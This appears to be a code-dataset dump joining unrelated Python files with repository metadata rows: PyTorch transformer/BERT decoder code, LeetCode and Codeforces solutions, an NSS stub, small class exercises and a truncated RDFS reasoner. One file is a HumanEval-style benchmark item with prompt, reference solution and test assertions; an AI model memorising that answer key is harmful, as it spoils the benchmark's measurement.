batch_size, max_len = src.shape[1], tgt.shape[0]
src_key_padding_mask = self.generate_key_mask(src, lengths)
outputs = torch.zeros(max_len, batch_size, self.opt_vocab_size)
if torch.cuda.is_available():
outputs = outputs.cuda()
# src: [seq, batch, d_model]
src = self.pos_enc(self.embed_src(src) * math.sqrt(self.d_model))
# memory: [seq, batch, d_model]
memory = self.encoder(src, src_key_padding_mask=src_key_padding_mask)
# hidden: [2, batch, d_model]
hidden = torch.randn(self.utter_n_layer, batch_size, self.hidden_size)
if torch.cuda.is_available():
hidden = hidden.cuda()
output = tgt[0, :]
use_teacher = random.random() < self.teach_force
if use_teacher:
for t in range(1, max_len):
output, hidden = self.decoder(output, hidden, memory)
outputs[t] = output
output = tgt[t]
else:
for t in range(1, max_len):
output, hidden = self.decoder(output, hidden, memory)
outputs[t] = output
output = output.topk(1)[1].squeeze().detach()
# [max_len, batch, output_size]
return outputs
def predict(self, src, maxlen, lengths, loss=True):
with torch.no_grad():
batch_size = src.shape[1]
src_key_padding_mask = self.generate_key_mask(src, lengths)
outputs = torch.zeros(maxlen, batch_size)
floss = torch.zeros(maxlen, batch_size, self.opt_vocab_size)
if torch.cuda.is_available():
outputs = outputs.cuda()
floss = floss.cuda()
# src: [seq, batch, d_model]
src = self.pos_enc(self.embed_src(src) * math.sqrt(self.d_model))
# memory: [seq, batch, d_model]
memory = self.encoder(src, src_key_padding_mask=src_key_padding_mask)
# hidden: [2, batch, d_model]
hidden = torch.randn(self.utter_n_layer, batch_size, self.hidden_size)
if torch.cuda.is_available():
hidden = hidden.cuda()
output = torch.zeros(batch_size, dtype=torch.long).fill_(self.sos)
if torch.cuda.is_available():
output = output.cuda()
for t in range(1, maxlen):
output, hidden = self.decoder(output, hidden, memory)
floss[t] = output
# output = torch.max(output, 1)[1] # [1]
output = output.topk(1)[1].squeeze()
outputs[t] = output # output: [1, output_size]
if loss:
return outputs, floss
else:
return outputs
'''
class Transformer(nn.Module):
# Refer to:
# - https://github.com/andrewpeng02/transformer-translation
def __init__(self, inpt_vocab_size, opt_vocab_size, d_model, nhead,
num_encoder_layers, num_decoder_layers,
dim_feedforward, dropout, sos=0, pad=0):
super(Transformer, self).__init__()
self.d_model = d_model
self.embed_src = nn.Embedding(inpt_vocab_size, d_model)
self.embed_tgt = nn.Embedding(opt_vocab_size, d_model)
self.pos_enc = PositionEmbedding(d_model, dropout=dropout)
self.inpt_vocab_size = inpt_vocab_size
self.opt_vocab_size = opt_vocab_size
self.pad, self.sos = pad, sos
self.model = nn.Transformer(d_model, nhead,
num_encoder_layers,
num_decoder_layers,
dim_feedforward,
dropout)
self.fc = nn.Linear(d_model, opt_vocab_size)
self.init_weight()
def init_weight(self):
for p in self.parameters():
if p.dim() > 1:
init.xavier_normal_(p)
def forward(self, src, tgt,
src_key_padding_mask,
tgt_key_padding_mask,
memory_key_padding_mask):
# src, tgt: [seq, batch]
tgt_mask = gen_nopeek_mask(tgt.shape[0])
src = self.pos_enc(self.embed_src(src) * math.sqrt(self.d_model))
tgt = self.pos_enc(self.embed_tgt(tgt) * math.sqrt(self.d_model))
# encoder and decoder in one line
# input:
# src: [seq, batch]
# tgt: [seq, batch]
# src_key_padding_mask: [batch, seq]
# tgt_key_padding_mask: [batch, seq]
# memory_key_padding_mask: [batch, seq]
# output: [seq, batch, vocab]
output = self.model(src,
tgt,
tgt_mask=tgt_mask,
src_key_padding_mask=src_key_padding_mask,
tgt_key_padding_mask=tgt_key_padding_mask,
memory_key_padding_mask=memory_key_padding_mask)
# [seq, batch, vocab_size]
return F.log_softmax(self.fc(output), dim=-1)
def predict(self, src,
src_key_padding_mask,
memory_key_padding_mask,
maxlen):
# src: [seq, batch]
with torch.no_grad():
batch_size = src.shape[1]
outputs = torch.zeros(maxlen, batch_size)
floss = torch.zeros(maxlen, batch_size, self.opt_vocab_size)
if torch.cuda.is_available():
outputs = outputs.cuda()
floss = floss.cuda()
output = torch.zeros(batch_size, dtype=torch.long).fill_(self.sos)
if torch.cuda.is_available():
output = output.cuda()
output = [output]
src = self.pos_enc(self.embed_src(src) * math.sqrt(self.d_model))
for t in range(1, maxlen):
# tgt: [seq, batch, vocab_size]
# this part is slow druing inference
tgt_mask = gen_nopeek_mask(t)
soutput = torch.stack(output)
soutput = self.pos_enc(self.embed_tgt(soutput) * math.sqrt(self.d_model))
tgt = self.model(src,
soutput,
src_key_padding_mask=src_key_padding_mask,
memory_key_padding_mask=memory_key_padding_mask,
tgt_key_padding_mask=None,
tgt_mask=tgt_mask)
tgt = F.log_softmax(self.fc(tgt[-1]), dim=-1) # [batch, vocab_size]
floss[t] = tgt
tgt = tgt.topk(1)[1].squeeze() # [batch]
outputs[t] = tgt
output.append(tgt)
return outputs, floss
'''
'''
def bert_for_masked_lm_forward(self, input_ids, encoder_hidden, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None,
masked_lm_labels=None):
outputs = self.bert(input_ids,
attention_mask=attention_mask,
encoder_hidden=encoder_hidden, # NOTE: add this line
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask)
sequence_output = outputs[0]
prediction_scores = self.cls(sequence_output)
outputs = (prediction_scores,) + outputs[2:] # Add hidden states and attention if they are here
if masked_lm_labels is not None:
loss_fct = torch.nn.CrossEntropyLoss(ignore_index=-1)
masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), masked_lm_labels.view(-1))
outputs = (masked_lm_loss,) + outputs
return outputs # (masked_lm_loss), prediction_scores, (hidden_states), (attentions)
def bert_model_forward(self, input_ids, encoder_hidden, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None):
if attention_mask is None:
attention_mask = torch.ones_like(input_ids)
if token_type_ids is None:
token_type_ids = torch.zeros_like(input_ids)
# We create a 3D attention mask from a 2D tensor mask.
# Sizes are [batch_size, 1, 1, to_seq_length]
# So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]
# this attention mask is more simple than the triangular masking of causal attention
# used in OpenAI GPT, we just need to prepare the broadcast dimension here.
extended_attention_mask = attention_mask.unsqueeze(1).unsqueeze(2)
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
extended_attention_mask = extended_attention_mask.to(dtype=next(self.parameters()).dtype) # fp16 compatibility
extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
if head_mask is not None:
if head_mask.dim() == 1:
head_mask = head_mask.unsqueeze(0).unsqueeze(0).unsqueeze(-1).unsqueeze(-1)
head_mask = head_mask.expand(self.config.num_hidden_layers, -1, -1, -1, -1)
elif head_mask.dim() == 2:
head_mask = head_mask.unsqueeze(1).unsqueeze(-1).unsqueeze(-1) # We can specify head_mask for each layer
head_mask = head_mask.to(dtype=next(self.parameters()).dtype) # switch to fload if need + fp16 compatibility
else:
head_mask = [None] * self.config.num_hidden_layers
embedding_output = self.embeddings(input_ids, position_ids=position_ids, token_type_ids=token_type_ids)
encoder_outputs = self.encoder(embedding_output,
encoder_hidden, # NOTE: add this line
extended_attention_mask,
head_mask=head_mask)
sequence_output = encoder_outputs[0]
pooled_output = self.pooler(sequence_output)
outputs = (sequence_output, pooled_output,) + encoder_outputs[1:] # add hidden_states and attentions if they are here
return outputs # sequence_output, pooled_output, (hidden_states), (attentions)
def bert_encoder_forward(self, hidden_states, encoder_hidden, attention_mask=None, head_mask=None):
all_hidden_states = ()
all_attentions = ()
for i, layer_module in enumerate(self.layer):
if self.output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
# NOTE: add `encoder_hidden` to next line
layer_outputs = layer_module(hidden_states, encoder_hidden, attention_mask, head_mask[i])
hidden_states = layer_outputs[0]
if self.output_attentions:
all_attentions = all_attentions + (layer_outputs[1],)
# Add last layer
if self.output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
outputs = (hidden_states,)
if self.output_hidden_states:
outputs = outputs + (all_hidden_states,)
if self.output_attentions:
outputs = outputs + (all_attentions,)
return outputs # last-layer hidden state, (all hidden states), (all attentions)
def bert_layer_forward(self, hidden_states, encoder_hidden, attention_mask=None, head_mask=None):
attention_outputs = self.attention(hidden_states, attention_mask, head_mask)
attention_output = attention_outputs[0]
# NOTE: add the 2 line blow
attention_outputs = self.cross_atten(attention_output, encoder_hidden, attention_mask, head_mask)
attention_output = attention_outputs[0]
intermediate_output = self.intermediate(attention_output)
layer_output = self.output(intermediate_output, attention_output)
outputs = (layer_output,) + attention_outputs[1:] # add attentions if we output them
return outputs
def cross_atten_block_forward(self, input_tensor, encoder_hidden, attention_mask=None, head_mask=None):
self_outputs = self.self(input_tensor, encoder_hidden, attention_mask, head_mask) # NOTE: add `encoder_hidden`
attention_output = self.output(self_outputs[0], input_tensor)
outputs = (attention_output,) + self_outputs[1:] # add attentions if we output them
return outputs
def cross_bert_self_atten_forward(self, hidden_states, encoder_hidden, attention_mask=None, head_mask=None):
mixed_query_layer = self.query(hidden_states)
mixed_key_layer = self.key(encoder_hidden) # NOTE: change `hidden_states` to `encoder_hidden`
mixed_value_layer = self.value(encoder_hidden) # NOTE: change `hidden_states` to `encoder_hidden`
query_layer = self.transpose_for_scores(mixed_query_layer)
key_layer = self.transpose_for_scores(mixed_key_layer)
value_layer = self.transpose_for_scores(mixed_value_layer)
# Take the dot product between "query" and "key" to get the raw attention scores.
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
# NOTE: Commented to remove attention mask (target to source)
# if attention_mask is not None:
# # Apply the attention mask is (precomputed for all layers in BertModel forward() function)
# attention_scores = attention_scores + attention_mask
# Normalize the attention scores to probabilities.
attention_probs = nn.Softmax(dim=-1)(attention_scores)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.dropout(attention_probs)
# Mask heads if we want to
if head_mask is not None:
attention_probs = attention_probs * head_mask
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
context_layer = context_layer.view(*new_context_layer_shape)
outputs = (context_layer, attention_probs) if self.output_attentions else (context_layer,)
return outputs
def mask_bert_self_atten_forward(self, hidden_states, attention_mask=None, head_mask=None):
mixed_query_layer = self.query(hidden_states)
mixed_key_layer = self.key(hidden_states)
mixed_value_layer = self.value(hidden_states)
query_layer = self.transpose_for_scores(mixed_query_layer)
key_layer = self.transpose_for_scores(mixed_key_layer)
value_layer = self.transpose_for_scores(mixed_value_layer)
# Take the dot product between "query" and "key" to get the raw attention scores.
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
# NOTE: Triangle mask (target to target)
target_len = attention_scores.size(-1)
mask = torch.tril(torch.ones(target_len, target_len))
mask = mask.masked_fill(mask == 0, float('-inf'))
mask = mask.masked_fill(mask == 1, 0.0)
mask = mask.to(next(self.parameters()).device)
mask = mask.unsqueeze(0).unsqueeze(0)
attention_scores = attention_scores + mask
# NOTE: Commented
# if attention_mask is not None:
# # Apply the attention mask is (precomputed for all layers in BertModel forward() function)
# attention_scores = attention_scores + attention_mask
# Normalize the attention scores to probabilities.
attention_probs = nn.Softmax(dim=-1)(attention_scores)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.dropout(attention_probs)
# Mask heads if we want to
if head_mask is not None:
attention_probs = attention_probs * head_mask
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
context_layer = context_layer.view(*new_context_layer_shape)
outputs = (context_layer, attention_probs) if self.output_attentions else (context_layer,)
return outputs
class Decoder(nn.Module):
def __init__(self):
super().__init__()
config = transformers.BertConfig()
config.num_hidden_layers = 6
self.masked_lm = transformers.BertForMaskedLM(config)
for layer in self.masked_lm.bert.encoder.layer:
layer.cross_atten = transformers.modeling_bert.BertAttention(self.masked_lm.config)
layer.cross_atten.load_state_dict(layer.attention.state_dict())
def forward(self, input_ids, encoder_hidden):
self.bind_methods()
return self.masked_lm(input_ids, encoder_hidden)[0]
def bind_methods(self):
r"""Change forward method to add `encoder_hidden`.
Architecture:
(masked_lm): BertForMaskedLM [change forward]
(bert): BertModel [change forward]
(embeddings): BertEmbeddings
(encoder): BertEncoder [change forward]
(layer): ModuleList
(0): BertLayer [change forward]
(attention): BertAttention [change forward] [triangle mask]
(self): BertSelfAttention
(output): BertSelfOutput
(cross_atten): BertAttention [change forward] [add model]
(self): BertSelfAttention [change forward]
(output): BertSelfOutput
(intermediate): BertIntermediate
(output): BertOutput
(pooler): BertPooler
(cls): BertOnlyMLMHead
(predictions): BertLMPredictionHead
(transform): BertPredictionHeadTransform
(decoder): Linear
"""
self.masked_lm.forward = types.MethodType(bert_for_masked_lm_forward, self.masked_lm)
self.masked_lm.bert.forward = types.MethodType(bert_model_forward, self.masked_lm.bert)
self.masked_lm.bert.encoder.forward = types.MethodType(bert_encoder_forward, self.masked_lm.bert.encoder)
for layer in self.masked_lm.bert.encoder.layer:
layer.forward = types.MethodType(bert_layer_forward, layer)
layer.cross_atten.forward = types.MethodType(cross_atten_block_forward, layer.cross_atten)
layer.cross_atten.self.forward = types.MethodType(cross_bert_self_atten_forward, layer.cross_atten.self)
layer.attention.self.forward = types.MethodType(mask_bert_self_atten_forward, layer.attention.self)
class Transformer(nn.Module):
def __init__(self):
super(Transformer, self).__init__()
self.tokenizer = transformers.BertTokenizer.from_pretrained('config/vocab_en.txt')
print(f'[!] transformer model, vocab size: {len(self.tokenizer)}')
self.vocab_size = len(self.tokenizer)
config = transformers.BertConfig()
config.num_hidden_layers = 6
self.encoder = transformers.BertModel(config)
self.decoder = Decoder()
self.teach_force = 1
config = self.encoder.config
self.decoder.masked_lm.cls.predictions.decoder = \
nn.Linear(config.hidden_size, config.vocab_size, bias=False)
self.decoder.masked_lm.cls.predictions.decoder.weight.data.copy_(
self.encoder.embeddings.word_embeddings.weight)
self.decoder.masked_lm.cls.predictions.bias = \
torch.nn.Parameter(torch.zeros(config.vocab_size))
def get_token_type_ids(self, x):
token_type_ids = torch.zeros_like(x)
for i in range(x.size(0)):
sep_index = (x[i] == self.tokenizer.sep_token_id).nonzero()
sep_index = sep_index.squeeze(-1).tolist()
sep_index.append(len(x[0]))
sep_index.append(len(x[i]) - 1)
for j in range(0, len(sep_index) // 2 * 2, 2):
start, end = sep_index[j], sep_index[j + 1]
token_type_ids[i, start+1:end+1] = 1
return token_type_ids
def forward(self, x, y):
# x, y: [batch, seq_len]
token_type_ids = self.get_token_type_ids(x)
encoder_hidden = self.encoder(x, token_type_ids=token_type_ids)[0]
# logits: [batch, seq, vocab]
logits = self.decoder(y[:, :-1], encoder_hidden)
return logits
def predict(self, x, max_len):
# x: [batch, seq]
with torch.no_grad():
token_type_ids = self.get_token_type_ids(x)
encoder_hidden = self.encoder(x)[0]
# token_ids: [batch, maxlen]
token_ids = torch.empty(x.size(0), max_len, dtype=torch.int64)
token_ids[:, 0].fill_(self.tokenizer.cls_token_id) # begin
token_ids[:, 1:].fill_(self.tokenizer.pad_token_id) # <pad>
token_ids = token_ids.to(next(self.parameters()).device)
for i in range(max_len - 1):
with torch.no_grad():
logits = self.decoder(token_ids, encoder_hidden)
new_token_ids = logits[:, i].argmax(dim=-1)
token_ids[:, i + 1] = new_token_ids
return token_ids
'''
| [
"[email protected]"
] | |
09275b427690ef44e7430628700f07f44cb8824f | 627b050148e767be12cfc7dfa81b1c6368cf3104 | /LeetCode/Apr20Challenge/Week4/day28_first_unique_number.py | dbac91abe928bd0387b8a926467a0d6759e87d98 | [] | no_license | imn00133/algorithm | 6ce5d10491bde853eb9e4d6a69bde3124723875c | 40d7bbe6e3cfe932122c32a9f730f951e948ef2d | refs/heads/master | 2022-08-13T20:26:06.200622 | 2022-07-31T08:54:26 | 2022-07-31T08:54:26 | 231,281,731 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,776 | py | #
# Solved Date: 20.04.28.
import collections
class FirstUnique:
def __init__(self, nums):
self.unique = None
self.next_unique_queue = collections.deque()
self.manage_unique = collections.defaultdict(int)
for number in nums:
self.manage_unique[number] += 1
if self.manage_unique[number] == 1:
self.next_unique_queue.append(number)
self.find_next_unique()
def show_first_unique(self) -> int:
if self.unique is not None:
return self.unique
else:
return -1
def add(self, value) -> None:
self.manage_unique[value] += 1
if self.manage_unique[value] == 1:
self.next_unique_queue.append(value)
if value == self.show_first_unique() or self.show_first_unique() == -1:
self.find_next_unique()
def find_next_unique(self):
while self.next_unique_queue:
number = self.next_unique_queue.popleft()
if self.manage_unique[number] == 1:
self.unique = number
break
else:
self.unique = None
def test():
queue = FirstUnique([2, 3, 5])
print(queue.show_first_unique())
queue.add(5)
print(queue.show_first_unique())
queue.add(2)
print(queue.show_first_unique())
queue.add(3)
print(queue.show_first_unique())
print()
queue = FirstUnique([7, 7, 7])
print(queue.show_first_unique())
queue.add(7)
queue.add(3)
queue.add(3)
queue.add(7)
queue.add(17)
print(queue.show_first_unique())
print()
queue = FirstUnique([809])
print(queue.show_first_unique())
queue.add(809)
print(queue.show_first_unique())
if __name__ == '__main__':
test()
| [
"[email protected]"
] | |
a669bc69cb66d9ef0348342ab4523d913845ef3c | ca3a49676cdf1016b2d729f0432b451d35b7a281 | /human_eval/51b1be3f-d417-418d-9236-bf203e68cd76.py | 68a5863b1201739cd1b33a0edc4579baab2e15f8 | [
"MIT"
] | permissive | SquareandCompass/code-align-evals-data | 3bb71b605316f56bb27466f23706a329f3fb4938 | 97446d992c3785d6605f1500b2c9b95d042e7b9c | refs/heads/main | 2023-06-19T12:47:56.277363 | 2021-07-21T00:22:56 | 2021-07-21T00:22:56 | 640,147,842 | 0 | 1 | null | 2023-05-13T06:22:30 | 2023-05-13T06:22:29 | null | UTF-8 | Python | false | false | 1,269 | py | ENTRY_POINT = 'check_if_last_char_is_a_letter'
#[PROMPT]
def check_if_last_char_is_a_letter(txt):
'''
Create a function that returns True if the last character
of a given string is an alphabetical character and is not
a part of a word, and False otherwise.
Note: "word" is a group of characters separated by space.
Examples:
check_if_last_char_is_a_letter("apple pie") ➞ False
check_if_last_char_is_a_letter("apple pi e") ➞ True
check_if_last_char_is_a_letter("apple pi e ") ➞ False
check_if_last_char_is_a_letter("") ➞ False
'''
#[SOLUTION]
check = txt.split(' ')[-1]
return True if len(check) == 1 and (97 <= ord(check.lower()) <= 122) else False
#[CHECK]
def check(candidate):
# Check some simple cases
assert candidate("apple") == False
assert candidate("apple pi e") == True
assert candidate("eeeee") == False
assert candidate("A") == True
assert candidate("Pumpkin pie ") == False
assert candidate("Pumpkin pie 1") == False
assert candidate("") == False
assert candidate("eeeee e ") == False
assert candidate("apple pie") == False
assert candidate("apple pi e ") == False
# Check some edge cases that are easy to work out by hand.
assert True
| [
"[email protected]"
] | |
a1e485a39c453c99a40f6f2d40cad085fe060fb2 | c7a6f8ed434c86b4cdae9c6144b9dd557e594f78 | /ECE364/.PyCharm40/system/python_stubs/348993582/nss/nss/RDN.py | 0e53aeab1e6b2f125e445f912c8e9778bbce5a23 | [] | no_license | ArbalestV/Purdue-Coursework | 75d979bbe72106975812b1d46b7d854e16e8e15e | ee7f86145edb41c17aefcd442fa42353a9e1b5d1 | refs/heads/master | 2020-08-29T05:27:52.342264 | 2018-04-03T17:59:01 | 2018-04-03T17:59:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,870 | py | # encoding: utf-8
# module nss.nss
# from /usr/lib64/python2.6/site-packages/nss/nss.so
# by generator 1.136
""" This module implements the NSS functions """
# no imports
from object import object
class RDN(object):
"""
An object representing an X501 Relative Distinguished Name (e.g. RDN).
RDN objects contain an ordered list of `AVA` objects.
Examples::
RDN()
RDN(nss.AVA('cn', 'www.redhat.com'))
RDN([ava0, ava1])
The RDN object constructor may be invoked with zero or more
`AVA` objects, or you may optionally pass a list or tuple of `AVA`
objects.
RDN objects contain an ordered list of `AVA` objects. The
RDN object has both sequence and mapping behaviors with respect to
the AVA's they contain. Thus you can index an AVA by position, by
name, or by SecItem (if it's an OID). You can iterate over the list,
get it's length or take a slice.
If you index by string the string may be either a canonical name for
the AVA type (e.g. 'cn') or the dotted-decimal notation for the OID
(e.g. 2.5.4.3). There may be multiple AVA's in a RDN whose type matches
(e.g. OU=engineering+OU=boston). It is not common to have more than
one AVA in a RDN with the same type. However because of the possiblity
of being multi-valued when indexing by type a list is always returned
containing the matching AVA's. Thus::
rdn = nss.RDN(nss.AVA('OU', 'engineering'))
rdn['ou']
returns [AVA('OU=engineering')
rdn = nss.RDN(nss.AVA('OU', 'engineering'), nss.AVA('OU', 'boston'))
rdn['ou']
returns [AVA('OU=boston'), AVA('OU=engineering')]
Examples::
rdn = nss.RDN(nss.AVA('cn', 'www.redhat.com'))
str(rdn)
returns 'CN=www.redhat.com'
rdn[0]
returns an `AVA` object with the value C=US
rdn['cn']
returns a list comprised of an `AVA` object with the value CN=www.redhat.com
rdn['2.5.4.3']
returns a list comprised of an `AVA` object with the value CN=www.redhat.com
because 2.5.4.3 is the dotted-decimal OID for common name (i.e. cn)
rdn.has_key('cn')
returns True because the RDN has a common name RDN
rdn.has_key('2.5.4.3')
returns True because the RDN has a common name AVA
because 2.5.4.3 is the dotted-decimal OID for common name (i.e. cn)
len(rdn)
returns 1 because there is one `AVA` object in it
list(rdn)
returns a list of each `AVA` object in it
"""
def has_key(self, arg): # real signature unknown; restored from __doc__
"""
has_key(arg) -> bool
:Parameters:
arg : string or integer
canonical name (e.g. 'cn') or oid dotted-decimal or
SEC_OID_* enumeration constant
return True if RDN has an AVA whose oid can be identified by arg.
"""
return False
def __cmp__(self, y): # real signature unknown; restored from __doc__
""" x.__cmp__(y) <==> cmp(x,y) """
pass
def __getitem__(self, y): # real signature unknown; restored from __doc__
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self): # real signature unknown; restored from __doc__
pass
def __len__(self): # real signature unknown; restored from __doc__
""" x.__len__() <==> len(x) """
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
| [
"[email protected]"
] | |
67a8e024e53d7041f7109406e394418a30cabb10 | 6bd9d7679011042f46104d97080786423ae58879 | /1690/c/c.py | 05a66b00321f18a9b1c0841c33b880eda782958a | [
"CC-BY-4.0"
] | permissive | lucifer1004/codeforces | 20b77bdd707a1e04bc5b1230f5feb4452d5f4c78 | d1fe331d98d6d379723939db287a499dff24c519 | refs/heads/master | 2023-04-28T16:00:37.673566 | 2023-04-17T03:40:27 | 2023-04-17T03:40:27 | 212,258,015 | 3 | 1 | null | 2020-10-27T06:54:02 | 2019-10-02T04:53:36 | C++ | UTF-8 | Python | false | false | 471 | py | from sys import stdin
def input(): return stdin.readline().strip()
def read_int():
return int(input())
def read_ints():
return map(int, input().split())
t = read_int()
for case_num in range(t):
n = read_int()
s = list(read_ints())
f = list(read_ints())
d = []
for i in range(n):
if i == 0 or s[i] >= f[i - 1]:
d.append(f[i] - s[i])
else:
d.append(f[i] - f[i - 1])
print(' '.join(map(str, d)))
| [
"[email protected]"
] | |
cb9ad7f3950ff6065752bffa32432288fbc57bc1 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/8/ti_.py | 41e20b589684d5f3162010636a3b247638095db8 | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'tI_':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"[email protected]"
] | |
b1db52e476e7f1ade39cda5d0191f6c042142711 | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/classvs_20200630154634.py | 8a7e8665bf8b3e3c22a42c56688dd4c01f2f0c85 | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 638 | py | class Person:
age = 0
# this is a constructor
def __init__(self,initialAge):
if initialAge > 0:
self.age = initialAge
else:
self.age = 0
print("Age is not valid, setting age to 0.. ")
def yearPasses(self):
self.age = self.age +1
return self.age
def amOld(self):
if self.age < 13:
print("You are young..")
if self.age >= 13 and self.age < 18:
print("You are a teenager..")
else:
print("You are old..")
# this is an object
person = Person(10)
person.yearPasses()
person.amOld()
| [
"[email protected]"
] | |
ed2fdb1bb003f7c36e88a99e59dff4ea2d85a2af | 42ea9b76bfbf4d609f655d897082fb3f46bf4058 | /src/minimalkb/services/simple_rdfs_reasoner.py | f9a108d6c2e04bd7809837b58efbe8129461d309 | [
"BSD-3-Clause"
] | permissive | chili-epfl/minimalkb | a9ffe957caa8fd24645117e7afbc97b7406c3048 | 25d90d90dc9e8dbf41ba18bf522a80eeb6520dbb | refs/heads/master | 2021-05-20T17:37:52.403932 | 2021-02-25T09:30:09 | 2021-02-25T09:30:09 | 13,498,236 | 4 | 1 | BSD-3-Clause | 2021-02-25T02:39:50 | 2013-10-11T12:21:29 | Python | UTF-8 | Python | false | false | 7,032 | py | import logging; logger = logging.getLogger("minimalKB."+__name__);
DEBUG_LEVEL=logging.DEBUG
import time
import datetime
import sqlite3
from minimalkb.backends.sqlite import sqlhash
from minimalkb.kb import DEFAULT_MODEL
REASONER_RATE = 5 #Hz
class OntoClass:
def __init__(self, name):
self.name = name
self.parents = set()
self.children = set()
self.instances = set()
self.equivalents = set()
def __repr__(self):
return self.name + \
"\n\tParents: " + str(self.parents) + \
"\n\tChildren: " + str(self.children) + \
"\n\tInstances: " + str(self.instances)
class SQLiteSimpleRDFSReasoner:
SYMMETRIC_PREDICATES = {"owl:differentFrom", "owl:sameAs", "owl:disjointWith"}
def __init__(self, database = "kb.db"):
self.db = sqlite3.connect(':memory:') # create a memory database
self.shareddb = sqlite3.connect(database)
# create the tables
# taken from http://stackoverflow.com/questions/4019081
query = None
for line in self.shareddb.iterdump():
if "triples" in line:
query = line
break
self.db.executescript(query)
self.running = True
logger.info("Reasoner (simple RDFS) started. Classification running at %sHz" % REASONER_RATE)
####################################################################
####################################################################
def classify(self):
starttime = time.time()
self.copydb()
models = self.get_models()
newstmts = []
for model in models:
rdftype, subclassof = self.get_missing_taxonomy_stmts(model)
newstmts += [(i, "rdf:type", c, model) for i,c in rdftype]
newstmts += [(cc, "rdfs:subClassOf", cp, model) for cc,cp in subclassof]
newstmts += self.symmetric_statements(model)
if newstmts:
logger.debug("Reasoner added new statements to the knowledge base:\n -" +\
"\n - ".join(["%s %s %s (in %s)" % stmt for stmt in newstmts]))
self.update_shared_db(newstmts)
logger.info("Classification took %fsec." % (time.time() - starttime))
def get_models(self):
with self.db:
return [row[0] for row in self.db.execute("SELECT DISTINCT model FROM triples")]
def get_onto(self, db, model = DEFAULT_MODEL):
onto = {}
rdftype = None
subclassof = None
equivalentclasses = None
with db:
rdftype = {(row[0], row[1]) for row in db.execute(
'''SELECT subject, object FROM triples
WHERE (predicate='rdf:type' AND model=?)
''', [model])}
subclassof = {(row[0], row[1]) for row in db.execute(
'''SELECT subject, object FROM triples
WHERE (predicate='rdfs:subClassOf' AND model=?)
''', [model])}
equivalentclasses = {(row[0], row[1]) for row in db.execute(
'''SELECT subject, object FROM triples
WHERE (predicate='owl:equivalentClass' AND model=?)
''', [model])}
for cc, cp in subclassof:
parent = onto.setdefault(cp, OntoClass(cp))
child = onto.setdefault(cc, OntoClass(cc))
child.parents.add(parent)
parent.children.add(child)
for i, c in rdftype:
onto.setdefault(c, OntoClass(c)).instances.add(i)
for ec1, ec2 in equivalentclasses:
equi1 = onto.setdefault(ec1, OntoClass(ec1))
equi2 = onto.setdefault(ec2, OntoClass(ec2))
equi1.equivalents.add(equi2)
equi2.equivalents.add(equi1)
return onto, rdftype, subclassof
def get_missing_taxonomy_stmts(self, model = DEFAULT_MODEL):
onto, rdftype, subclassof = self.get_onto(self.db, model)
newrdftype = set()
newsubclassof = set()
def addinstance(instance, cls):
newrdftype.add((instance, cls.name))
for p in cls.parents:
addinstance(instance, p)
def addsubclassof(scls, cls):
newsubclassof.add((scls.name, cls.name))
for p in cls.parents:
addsubclassof(scls, p)
for name, cls in onto.items():
for i in cls.instances:
addinstance(i, cls)
for p in cls.parents:
addsubclassof(cls, p)
for equivalent in cls.equivalents:
for i in cls.instances:
addinstance(i, equivalent)
for p in cls.parents:
addsubclassof(equivalent, p)
